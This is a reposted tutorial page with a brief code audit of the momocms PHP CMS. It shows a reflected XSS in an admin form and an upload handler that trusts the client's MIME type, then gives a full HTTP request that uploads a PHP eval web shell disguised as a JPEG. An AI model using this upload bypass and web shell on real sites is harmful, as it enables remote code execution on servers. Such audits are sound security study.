Home > Backend Development > PHP Tutorial > momocms code audit

momocms code audit

WBOY
Release: 2016-08-08 09:30:22
Original
1233 people have browsed it

When I was bored, I saw a popular program on Webmaster Home, so I downloaded it and looked at it.

The front-end $_GET is filtered using the intval() function, and there is nothing to exploit.

There is an xss in the background

at line 96 of

admincreate_sub_product.php

<span style="font-family:Microsoft YaHei;font-size:18px;"><input type="hidden" name="category" value="<?php echo $_GET[&#39;id&#39;]; ?>">
							<p>
</span>
Copy after login


Second: Upload vulnerability

at admin/banner_do.php The code in

is as follows

<span style="font-family:Microsoft YaHei;font-size:18px;">require("./database.php");
if(empty($_SESSION['momocms_admin'])){
	header("Location:./index.php");	
	exit;
}
if($_SESSION['momocms_isAdmin']==1){
if (($_FILES["banner"]["type"] == "image/gif")
|| ($_FILES["banner"]["type"] == "image/jpeg")
|| ($_FILES["banner"]["type"] == "image/png")
|| ($_FILES["banner"]["type"] == "image/pjpeg"))
  {
  if ($_FILES["banner"]["error"] > 0){
    echo "Return Code: " . $_FILES["banner"]["error"] . "<br />";
    }else{
    	if(!is_dir("../resource/slide/images")){
    		mkdir("../resource/slide/images");
    	}
    	 $pos = strrpos($_FILES["banner"]["name"],".");
    	 $back = substr($_FILES["banner"]["name"],$pos);
    	 $_FILES["banner"]["name"] = time().$back;
      move_uploaded_file($_FILES["banner"]["tmp_name"],
      "../resource/slide/images/".  $_FILES["banner"]["name"]);
      $pic="../resource/slide/images/".  $_FILES["banner"]["name"];
      echo '<script>
				parent.document.getElementById("successMsg").style.display="block";
				setTimeout(function(){
				parent.window.location.href="./banner.php";
				},1500);
				</script>';
    }
  }
}
</span>
Copy after login

You can see that upload to determines the upload type, but does not determine the upload suffix, etc.

So you can construct Content-type: image/jpeg to break through the upload

<span style="font-family:Microsoft YaHei;font-size:18px;">POST /test/momocms/admin/banner_do.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/test/momocms/admin/banner.php
Cookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------13761195204349
Content-Length: 227

-----------------------------13761195204349
Content-Disposition: form-data; name="banner"; filename="1.php"
Content-Type: image/jpeg

<?php eval($_POST[&#39;w&#39;]);?>
-----------------------------13761195204349--


</span>
Copy after login



Then where can you directly modify the php source code in the background widget

I’ve seen so much for the time being. There are others to look at later.

The above introduces momocms code audit, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template